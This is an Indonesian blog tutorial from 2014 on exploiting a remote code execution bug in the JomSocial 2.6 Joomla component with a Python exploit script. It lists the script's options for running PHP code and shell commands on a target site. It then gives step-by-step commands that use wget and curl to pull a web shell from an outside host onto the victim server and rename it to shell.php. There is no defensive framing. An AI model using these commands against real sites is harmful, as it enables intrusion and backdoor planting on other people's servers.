Breaking News
Loading...
Sunday, April 6, 2014

JomSocial 2.6 - Remote Code Execution

1:49 PM
JomSoc adalah perangkat komponen Joomla yang memungkin kan untuk membuat situs jejaring sosial canggih yang populer bebas penggunannya dan open source software Joomla. 

Pada komponen JomSoc v. 2.6 terdapat bug RCE (Remote Code Executin) yang memungkinkan attacker mengeksekusi kode - kode berbahaya untuk mengeksploitasi web yang memakai komponen ini. 

Bahan :

  1. Exploit
  2. Python 2.7
Step by step :
- Install Python yang udah di download
- Masuk ke cmd, masuk direktori dimana exploit berada
- Jalankan exploit

Perintah :
1. exploit.py -u http://127.0.0.1/index.php -opsi

Macam - macam opsi :
1. u -> url / web target format : http://situs.com/index.php
2. p -> mengeksekusi kode php "echo 'hello world';"
3. s -> mengeksekusi command shell : "netstat -n" 
4. c -> menggunakan functions : passthru

Cara tanam shell : 
1.  exploit.py -u http://127.0.0.1/index.php -s "wget http://situs.com/shell.txt"
2.  exploit.py -u http://127.0.0.1/index.php -s "mv shell.txt shell.php"
3.  exploit.py -u http://127.0.0.1/index.php -s "curl http://situs.com/shell.txt -o shell.php"

Demikian tutorial nya 

Sumber : http://forum.idca.or.id/showthread.php?tid=1999

0 komentar:

Post a Comment

 
Toggle Footer